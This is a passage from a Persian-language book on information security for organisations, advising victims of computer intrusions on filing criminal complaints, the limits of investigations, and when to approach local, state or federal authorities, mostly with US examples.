ﺍﮔﺮ ﺷـﺮﻛﺖ ﻓﺎﻗـﺪ ﺳـﻬﺎﻣﺪﺍﺭ ﻫـﻢ ﺑﺎﺷـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ،ﺣﺎﻣﻴﺎﻥ ﻭ ﻳـﺎ ﻣـﺸﺘﺮﻳﺎﻥ -ﺑـﺴﺘﻪ ﺑـﻪ
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫـﺮ ﻛـﺸﻮﺭ -ﺍﺯ ﺷـﻤﺎ ﺷـﻜﺎﻳﺖ
ﻧﻤﺎﻳﻨﺪ.
ﺍﮔﺮ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﻪ
ﺷﺪﺕ ﺩﺭ ﻣﻌﺮﺽ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭﺩﺍﺭﺩ ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ
ﺍﺯ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘـﻲ )ﻗﺒـﻞ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ( ﺑـﺎ ﻣـﺸﺎﻭﺭ
ﺣﻘﻮﻗﻲ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﮔﻔﺘﮕﻮ ﻛﻨﻴﺪ .ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﺘﻪ ﺑﻪ ﺩﺧﺎﻟﺖ ﻳـﺎ
ﻋﺪﻡ ﺩﺧﺎﻟﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺍﺗﺨـﺎﺫ
ﻣﻲ ﻛﻨﻨﺪ .ﺑﺎ ﺗﻤﺮﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻣﺎﻥ ﺑﺤﺮﺍﻥ ،ﺍﺣﺘﻤﺎﻝ ﺩﻧﺒﺎﻝﺷﺪﻥ
ﻭﺍﻗﻌﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺍﺳﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ.
ﺑﻌﻨﻮﺍﻥ ﭼﻨﺪ ﻣﻘﺪﻣﻪ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﺑﺤﺚ ،ﺍﻳﻦ ﻗﺴﻤﺖ ﻣـﺮﻭﺭﻱ ﺑـﺮ
ﭼﻨﺪ ﻣﺴﺌﻠﻪ -ﻛﻪ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﻮﻱ ﺷﻤﺎ ﻧﻴﺰ ﺭﻭﺯﻱ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ
ﻣﻲﺷﻮﻳﺪ -ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ:
ﺗﻨﻈﻴﻢ ﺷﻜﻮﺍﺋﻴﻪ ﺟﺰﺍﻳﻲ
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺣـﺴﺎﺱ ﻛﻨﻴـﺪ ﻛـﺴﻲ ﺧـﻼﻑ
ﻗﺎﻧﻮﻥ ﻋﻤﻞﻛﺮﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻠﻴﻪ ﺍﻭ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺍﻳـﻦ
ﺭﻭﻧﺪ ﺑـﺎ ﺗﻨﻈـﻴﻢ ﺷـﻜﻮﺍﺋﻴﻪ ﻗـﻀﺎﻳﻲ ﺩﺭ ﻣﺮﺍﺟـﻊ ﺭﺳـﻤﻲ ﺷـﺮﻭﻉ
ﻣﻲﺷﻮﺩ .ﺳﭙﺲ ﺍﺯ ﺩﺍﺩﻳﺎﺭ ﺍﺟﺎﺯﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ
ﺍﺩﻋﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﺤﻘﻴﻖ ﺑﻌﻤﻞ ﺁﻳﺪ ﻭ ﺍﮔﺮ ﺟﺮﻣﻲ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ
ﺷﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﻳﻚ ﺩﺍﺩﺧﻮﺍﺳﺖ ﺗﻨﻈﻴﻢ ﺷﻮﺩ.
ﺩﺭ ﺑﺮﺧﻲ ﻭ ﺷﺎﻳﺪ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ،ﺗﺤﻘﻴﻘﺎﺕ ﺟﻨﺎﻳﻲ ﻧﺘﻴﺠـﻪﺍﻱ ﺑـﺮﺍﻱ
ﺷﻤﺎ ﺩﺭ ﭘﻲ ﻧﺪﺍﺭﺩ .ﭼﻨﺎﻧﭽﻪ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﻜـﺮﺍﺭ
ﻧﺸﻮﺩ ﻭ ﻧﻔﻮﺫﮔﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺧﻮﺩ ﺑـﺎﻗﻲ ﻧﮕﺬﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ،ﻳـﺎ ﺍﮔـﺮ
ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧـﺎﺭﺟﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ
ﺑﺎﺷﺪ ،ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳـﺖ ﻛـﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ
ﺩﺳﺘﮕﻴﺮ ﻛﻨﻴﺪ .ﻧﻔﻮﺫﮔﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﺑﻨﺪﺭﺕ ﺍﺯ ﺧﻮﺩ ﺭﺩ ﭘﺎﻳﻲ ﺑـﺎﻗﻲ
١٣١
ﻣﻲﮔﺬﺍﺭﻧﺪ.
ﺗﻨﻈﻴﻢ ﻭ ﺍﺭﺍﺋﻪ ﺷﻜﻮﺍﺋﻴﻪ ﻟﺰﻭﻣﹰﺎ ﺑﻪ ﺗﻌﻘﻴﺐ ﻗﻀﺎﻳﻲ ﻣﻨﺠﺮ ﻧﻤﻲﺷﻮﺩ.
ﺩﺍﺩﻳﺎﺭ ﻣﺮﺑﻮﻃﻪ )ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻱ ،ﺍﻳﺎﻟﺘﻲ ﻳﺎ ﻣﺤﻠﻲ( ﺩﺭ ﻣـﻮﺭﺩ
ﻗــﺎﻧﻮﻥ ﻧﻘــﺾ ﺷــﺪﻩ ،ﺷــﺪﺕ ﺟــﺮﻡ ،ﻟــﺰﻭﻡ ﻫﻤﻜــﺎﺭﻱ ﺑﺎﺯﺭﺳــﺎﻥ
ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻭ ﻧﻮﻉ ﻣﺤﻜﻮﻣﻴﺖ ﺗـﺼﻤﻴﻢ ﻣـﻲﮔﻴـﺮﺩ .ﺑـﻪ ﺧـﺎﻃﺮ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﻗﻀﺎﻳﻲ ﻣﻤﻠﻮ ﺍﺯ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﮔﻮﻧـﺎﮔﻮﻥ
ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﺟﺪﻳـﺪ
ﺩﺭﺻﻮﺭﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺟﺮﺍﺋﻢ ﺧﺎﺹ ﻭ ﻳـﺎ
ﻼ ﺍﺣﺘﻤــﺎﻝ ﺍﻧﺠــﺎﻡ ﺗﺤﻘﻴﻘــﺎﺕ ﺩﺭ
ﺗﻬﺪﻳــﺪﺍﺕ ﺟــﺪﻱ ﺑﺎﺷــﻨﺪ .ﻣــﺜ ﹰ
ﭘﺮﻭﻧﺪﻩﺍﻱ ﻛﻪ ﺩﺭ ﺁﻥ ۲۰۰،۰۰۰ﺩﻻﺭ ﺩﺍﺩﻩ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘـﻪ ،ﺍﺯ ﻳـﻚ
ﻣﻮﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻜﻨﻔﺮ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣـﻮﺩﻡ ،ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ
ﺷﻤﺎ ﺭﺍ ﭘﻮﻳﺶ ﻣﻲﻛﻨﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺳﺖ.
ﺍﻃﻼﻋﺎﺕ ﺭﺍﺟﻊ ﺑﻪ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﺑﺸﻮﺩ ﻳـﺎ
ﻧــﺸﻮﺩ .ﺣﺘــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺟﺮﻳــﺎﻥ ﺗﺤﻘﻴﻘــﺎﺕ ﺍﻃﻼﻋــﺎﺕ
ﻼ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﺎﺯﺭﺳـﺎﻥ ﺷـﺪﻳﺪﹰﺍ
ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ -ﻣﺜ ﹰ
ﻣﺸﻐﻮﻝ ﻛﺎﺭ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﻤﺎ ﮔﻔﺘﻪ ﺷﻮﺩ ﻫﻴﭽﮕﻮﻧﻪ ﺗﺤﻘﻴﻘـﺎﺗﻲ ﺩﺭ
ﻛﺎﺭ ﻧﻴﺴﺖ.
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ،ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣـﻮﻗﻌﻴﺘﻲ
ﻧﺎﭘﺎﻳﺪﺍﺭ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ ﺑﻪ ﻧﻔﻮﺫ ﺧـﻮﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ
ﺷﻤﺎ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻨـﺪ
ﻛﻪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﺑﮕﺬﺍﺭﻳﺪ ﺗﺎ ﺑﺎﺯﺭﺳﺎﻥ ﺍﺗﺼﺎﻻﺕ ﺳﻴـﺴﺘﻢ ﺭﺍ
ﺭﺩﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﺳﺘﮕﻴﺮﻱ ﻣﺘﻬﻢ ﺑـﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ
ﺑﭙﺮﺩﺍﺯﻧــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺑﺎﺯﮔﺬﺍﺷــﺘﻦ ﺩﺭﻫــﺎﻱ ﺳﻴــﺴﺘﻢ ﺑﻌــﺪ ﺍﺯ
ﻣﺸﺨﺺﺷﺪﻥ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ،
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺟﻬﺖ ﺍﻧﺠـﺎﻡ ﺧﺮﺍﺑﻜـﺎﺭﻱ
ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳـﻚ ﺩﺍﺩﻧﺎﻣـﺔ
ﺛﺎﻟﺚ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﻈﺎﻥ ﺍﺗﻬﺎﻡ ﻗـﺮﺍﺭ ﺩﻫـﺪ ،ﭼﺮﺍﻛـﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ
ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻣﺎﻧﻊ ﺍﺯ ﻭﺍﺭﺩ ﺷﺪﻥ ﺍﺗﻬﺎﻡ ﺑﻪ ﺷﻤﺎ ﻧﻴـﺴﺖ .ﭘـﺲ
ﺑﻬﺘﺮ ﺍﺳﺖ ﻗﺒﻞ ﺍﺯ ﭘـﺬﻳﺮﺵ ﭼﻨـﻴﻦ ﻣﺨـﺎﻃﺮﺍﺗﻲ ﺟﻮﺍﻧـﺐ ﺍﻣـﺮ ﺭﺍ
ﻼ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ.
ﻛﺎﻣ ﹰ
ﺗﻤﺎﺱ ﺑﺎ ﻣﺮﺍﺟﻊ ﻣﺮﺑﻮﻃﻪ
ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻮﻉ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ
ﻭ ﺟﺰﺍﺋﻲ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛـﻪ
ﺍﻗﺪﺍﻣﺎﺕ ﺧﺎﺻﻲ ﺭﺍ ﺟﻬﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﺴﺌﻮﻟﻴﻦ ﻣﺤﻠﻲ ﻳـﺎ
ﻼ ﺑﻌﻀﻲ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺁﻭﺭﺩﻩ ﺷـﺪﻩ
ﻛﺸﻮﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ .ﺫﻳ ﹰ
ﺍﻣﺎ ﻃﺒﻴﻌﺘﹰﺎ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﻃﺒﻖ ﺭﻭﺷـﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻛـﺸﻮﺭ ﺧﻮﺩﺗـﺎﻥ
ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ.
•
۱۳۱ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺑﺎﻫﻮﺵ ﻫـﺴﺘﻨﺪ
ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ.
ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺍﻭﻝ ﺑـﻪ
ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻳﺎ ﺍﺳﺘﺎﻧﻲ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻣﺮﺍﺟﻊ ﺍﺳﺘﺎﻧﻲ
ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻛﻪ ﻣﺴﺌﻠﻪ ﺗﻮﺳﻂ ﻋﻮﺍﻣﻞ ﻛﺸﻮﺭﻱ ﺑﻬﺘـﺮ
١٨١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺗﺤﻘﻴـﻖ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﺑـﻪ ﺷـﻤﺎ ﭘﻴـﺸﻨﻬﺎﺩ
ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ .ﻫﺮﭼﻨـﺪ ﻣﺘﺄﺳـﻔﺎﻧﻪ
ﻲ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﻋﻼﻗـﻪﺍﻱ ﺑـﻪ
ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺍﻳـﺮ ﻣﺤﻠـ ﹺ
ﻲ ﻣﺄﻣﻮﺭﺍﻥ ﻛﺸﻮﺭﻱ ﻧﺪﺍﺭﻧﺪ .ﺍﻳـﻦ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻴﺮﻭﻱ ﻛﻤﻜ ﹺ
ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺒﺐ ﺷﻮﺩ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﺗﺤﺖ ﺗﺤﻘﻴﻘﺎﺕ ﻗﺮﺍﺭ ﻧﮕﻴﺮﺩ.
•
ﻫﺮﭼﻨﺪ ﺑﺮﺧﻲ ﺍﺯ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺯﻣﻴﻨﺔ
ﺭﺍﻳﺎﻧﻪ ﻭ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﺎﺭﺕ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ
ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﻋﻤﻮﻣﹰﺎ ﻣـﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺍﺯ
ﻣﺴﺌﻮﻻﻥ ﺍﻳـﺎﻟﺘﻲ ﻭ ﻛـﺸﻮﺭﻱ ﺗﺠﺮﺑـﺔ ﻛﻤﺘـﺮﻱ ﺩﺍﺭﻧـﺪ ﻭ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﭘﻴﺸﺮﻓﺘﻪ ﺑﺮﺍﻳـﺸﺎﻥ ﺳـﺨﺖ
ﺑﺎﺷــﺪ .ﺩﺭ ﻋــﻮﺽ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻛــﺸﻮﺭﻱ ﺍﺯ
ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺑﻬﺮﻩﻣﻨﺪﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑـﻪ ﺳـﺮﻋﺖ
ﻭﺍﺭﺩ ﺟﺮﻳﺎﻥ ﺣﻞ ﻣﺸﻜﻼﺕ ﻛﺮﺩ.
•
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻘﺎﻣـﺎﺕ ﺍﻳـﺎﻟﺘﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﻘﺎﻣـﺎﺕ
ﻛﺸﻮﺭﻱ ﻋﻼﻗﺔ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ ﺗﻌﻘﻴـﺐ ﻭ ﻛـﺸﻒ ﺟـﺮﺍﺋﻢ
ﺟﻮﺍﻧﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ .ﺍﮔﺮ ﻣﻲﺩﺍﻧﻴـﺪ ﻛـﻪ ﺍﺯ
ﺟﺎﻧﺐ ﻳﻚ ﻧﻮﺟﻮﺍﻥ ﻛﻪ ﺩﺭ ﺍﻳﺎﻟـﺖ ﺧﻮﺩﺗـﺎﻥ ﺍﻗﺎﻣـﺖ ﺩﺍﺭﺩ
ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﻪ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠـﻲ
ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻫﻢ ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﻬـﺎﻱ
ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﻛﻨﺎﺭ ﺑﮕﺬﺍﺭﻳﺪ ﻭ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﻭﺍﻟـﺪﻳﻦ ﻳـﺎ
ﻣﻌﻠﻤــﻴﻦ ﺁﻥ ﻣﻬــﺎﺟﻢ ﺟــﻮﺍﻥ ﺻــﺤﺒﺖ ﻛﻨﻴــﺪ )ﻳــﺎ ﺍﺯ ﻳــﻚ
ﺣﻘﻮﻗﺪﺍﻥ ﻳﺎ ﭘﻠﻴﺲ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ(.
ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﮕﺮﺩ ﻣﺘﻬﻤﺎﻥ
ﺩﺭ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﺓ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ
ﻛﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﺗﺠﺮﺑﺔ ﻛﺎ ﹺﺭ ﺁﻧﻬﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﻭ
ﻳﺎ ﺗﻌﻘﻴﺐ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﻤﻲﺷﻮﺩ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺍﻳﺎﻧـﻪ ﻧﺪﺍﺭﻧـﺪ
ﺑﻤﻨﻈﻮﺭ ﺩﺭﻙ ﻧﻜﺎﺕ ﭘﺮﻭﻧﺪﻩ ،ﺷﻤﺎ ﺭﺍ ﺩﻋﻮﺕ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ.
ﺍﮔﺮ ﺍﺯ ﺷﻤﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻧﺘﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛـﻪ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺤﻘﻴـﻖ
ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺧﺖ ﻣﻮﺿـﻮﻉ ﻣـﺸﺎﺭﻛﺖ ﻧﻤﺎﺋﻴـﺪ ،ﺍﻃﻤﻴﻨـﺎﻥ
ﻳﺎﺑﻴﺪ ﻛﻪ ﺍﻳﻦ ﻋﻤﻞ ﺑﻪ ﺩﺳﺘﻮﺭ ﺩﺍﺩﮔﺎﻩ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳـﺖ؛ ﭼﺮﺍﻛـﻪ
ﺩﺭ ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﻨﻈــﺮ ﺑﻴﺎﻳــﺪ ﻛــﻪ ﻣــﺸﺘﺎﻕ
ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﺑﻮﺩﻩﺍﻳﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﻛـﻪ ﻳـﻚ ﺷـﺨﺺ ﺑﻴﻄـﺮﻑ ﺭﺍ
ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺩﻭﺍﻳﺮ ﺍﺟـﺮﺍﻱ
ﻗﺎﻧﻮﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ.
ﻣﻨﺶ ﻭ ﺭﻓﺘﺎﺭ ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﮔﻬﮕﺎﻩ ﻣـﺸﻜﻼﺕ ﺟـﺪﻱ ﺑﻮﺟـﻮﺩ
ﻣﻲﺁﻭﺭﺩ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺗﺠﻬﻴﺰﺍﺕ ﺷﻤﺎ ﺑﻪ ﺑﻬﺎﻧـﺔ ﺑـﺎﺯﺟﻮﻳﻲ
ﻳﺎ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺪﺗﻬﺎﻱ ﻏﻴﺮﻗﺎﺑﻞ ﺗﻮﺟﻴﻬﻲ ﺗﻮﻗﻴﻒ ﺷﻮﻧﺪ -ﺣﺘﻲ
ﺍﮔﺮ ﺧﻮﺩ ،ﻗﺮﺑﺎﻧﻲ ﻳﻚ ﺟﺮﻡ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷـﻴﺪ .ﺍﮔـﺮ ﺷـﻤﺎ ﻗﺮﺑـﺎﻧﻲ
ﻻ
ﺑﻮﺩﻩﺍﻳﺪ ﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺧﻮﺩﺗﺎﻥ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩﺍﻳـﺪ ،ﻣﻌﻤـﻮ ﹰ
